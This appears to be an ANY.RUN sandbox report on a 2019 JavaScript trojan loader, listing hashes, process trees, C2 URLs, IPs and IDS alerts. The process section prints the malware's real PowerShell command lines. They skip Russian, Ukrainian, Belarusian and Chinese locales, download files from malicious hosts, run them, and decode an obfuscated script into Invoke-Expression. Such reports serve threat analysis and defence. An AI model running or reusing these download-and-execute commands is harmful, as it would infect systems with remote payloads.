analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Versamento___0000_11083 xm.js

Full analysis: https://app.any.run/tasks/78a181e8-ea44-498f-bdd2-b70bf0077003
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 21, 2019, 15:50:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

28A2DE66A5C75C9060A165AA5816FF39

SHA1:

91881DCE944CE67088A3CD7A36B235B734855506

SHA256:

94EC7A50D72C709A3C6CBE3E7066DCA589C3424B969141CF6377FC215B8CA856

SSDEEP:

192:VcRpeoVtZTT45pq+LjA1KLUMpMMDzqz5CpW1HDKVO1:KV5TY5Q1wUqMMDzqz5CpiKV+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • SkypeApp64.exe (PID: 2668)

    • Connects to CnC server

      • powershell.exe (PID: 1020)
      • powershell.exe (PID: 3300)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 584)

    • Writes to a start menu file

      • powershell.exe (PID: 1020)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 584)

    • Executes scripts

      • powershell.exe (PID: 1632)
      • powershell.exe (PID: 1020)

    • Creates files in the user directory

      • powershell.exe (PID: 1632)
      • powershell.exe (PID: 584)
      • powershell.exe (PID: 1020)
      • powershell.exe (PID: 3300)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2732)
      • WScript.exe (PID: 2928)
      • WScript.exe (PID: 1784)

  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 1020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start wscript.exe no specs powershell.exe powershell.exe wscript.exe no specs skypeapp64.exe powershell.exe wscript.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2732"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Versamento___0000_11083 xm.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1632"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $ystuavett = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?cyezdw',$ystuavett); Start-Process $ystuavett;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
584"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $eibjsgxcgxafx = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'SkypeApp64.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?htswbitxzgza',$eibjsgxcgxafx); Start-Process $eibjsgxcgxafx;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2928"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2668"C:\Users\admin\AppData\Local\SkypeApp64.exe" C:\Users\admin\AppData\Local\SkypeApp64.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
1020"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $zyiswz = [System.IO.Path]::GetTempPath() + '\SearchI32.txt';$xhahjbeyxuzxthdzsyve = ''; ( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$zyiswz);;Get-Content $zyiswz | Where-Object {$_ -match $regex} | ForEach-Object { $xhahjbeyxuzxthdzsyve += $_ -replace '..(.)','$1'} ;Invoke-Expression -Command $xhahjbeyxuzxthdzsyve;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1784"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3300"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $zvbswdhbaxesvcz = [System.IO.Path]::GetTempPath() + '\SearchI32.txt';$xtxxfzuxwhcwb = ''; ( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$zvbswdhbaxesvcz);;Get-Content $zvbswdhbaxesvcz | Where-Object {$_ -match $regex} | ForEach-Object { $xtxxfzuxwhcwb += $_ -replace '..(.)','$1'} ;Invoke-Expression -Command $xtxxfzuxwhcwb;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 855
Read events
1 593
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
8
Text files
9
Unknown types
1

Dropped files

PID
Process
Filename
Type
1632powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FT7BZKMPMAYUGWXSEYS8.temp
MD5:
SHA256:
584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIQ470WYPQP6OQC3UX2T.temp
MD5:
SHA256:
1020powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UCOQH5NQC9Q66W6OUR8E.temp
MD5:
SHA256:
3300powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0RM32VD0VUZM2TL3JV10.temp
MD5:
SHA256:
1020powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.tmptext
MD5:13A08A2F9464818D4DCBBC8C3810FF98
SHA256:36EF222572DA69E36BD760BB20B16607758CE8D8165E22AD83274E2A9563EF3D
1020powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.txttext
MD5:A0BFBDF4765C4FDE27E3AE05B7DEB1AD
SHA256:BB09F1132DDBC6C53CFE16F8B0456E4AD8A556FEFB876BEF3A4CF66F09974827
3300powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfe3cf.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1632powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.jstext
MD5:523B83437A13B39DCA7C7DEA7EB72255
SHA256:A2BCDC896D8C901859CC443DEBE149D1E637745EBD421591457A8E0A9E31B4E2
1632powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf88de.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3300powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.txttext
MD5:44FD395E9E1E71D39434EEB3AE94F4DC
SHA256:724D2FFA584A75B0941F7D6682A187B2D03920E84CE6E6B11C0306280877F18A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1020
powershell.exe
GET
200
185.158.250.114:80
http://cdn.zaczvk.pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?b=USER-PC_DELL_62f21c60&v=321.1&psver=2
NL
text
14.6 Kb
malicious
3300
powershell.exe
GET
185.158.250.114:80
http://space.bajamelide.ch/?b=USER-PC_DELL_62f21c60&v=321.1&psver=2
NL
malicious
1020
powershell.exe
GET
200
185.158.250.114:80
http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php
NL
text
19.3 Kb
malicious
3300
powershell.exe
GET
200
185.158.250.114:80
http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php
NL
text
19.3 Kb
malicious
1020
powershell.exe
GET
200
185.158.250.114:80
http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php?b=USER-PC_DELL_62f21c60&v=321.1&psver=2
NL
text
19.3 Kb
malicious
584
powershell.exe
GET
200
31.214.157.69:80
http://cloud.kokoheadattorney.com/501?htswbitxzgza
NL
executable
260 Kb
malicious
1632
powershell.exe
GET
200
31.214.157.69:80
http://cloud.kokoheadattorney.com/502?cyezdw
NL
text
22.4 Kb
malicious
3300
powershell.exe
GET
200
185.158.250.114:80
http://space.bajamelide.ch/?b=USER-PC_DELL_62f21c60&v=321.1&psver=2
NL
text
2 b
malicious
3300
powershell.exe
GET
200
185.158.250.114:80
http://space.bajamelide.ch/?b=USER-PC_DELL_62f21c60&v=321.1&psver=2
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
584
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious
1020
powershell.exe
185.158.250.114:80
cdn.zaczvk.pl
M247 Ltd
NL
malicious
3300
powershell.exe
185.158.250.114:80
cdn.zaczvk.pl
M247 Ltd
NL
malicious
1632
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
cloud.kokoheadattorney.com
  • 31.214.157.69
malicious
cdn.zaczvk.pl
  • 185.158.250.114
unknown
space.bajamelide.ch
  • 185.158.250.114
malicious

Threats

PID
Process
Class
Message
584
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
584
powershell.exe
A Network Trojan was detected
ET TROJAN Possible Windows executable sent when remote host claims to send a Text File
584
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1020
powershell.exe
A Network Trojan was detected
ET TROJAN Unk/JS.Downloader CnC Checkin
3300
powershell.exe
A Network Trojan was detected
ET TROJAN Unk/JS.Downloader CnC Checkin
Process
Message
SkypeApp64.exe
MP3 file corrupted
SkypeApp64.exe
OGG 0
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Versamento___0000_11083 xm.js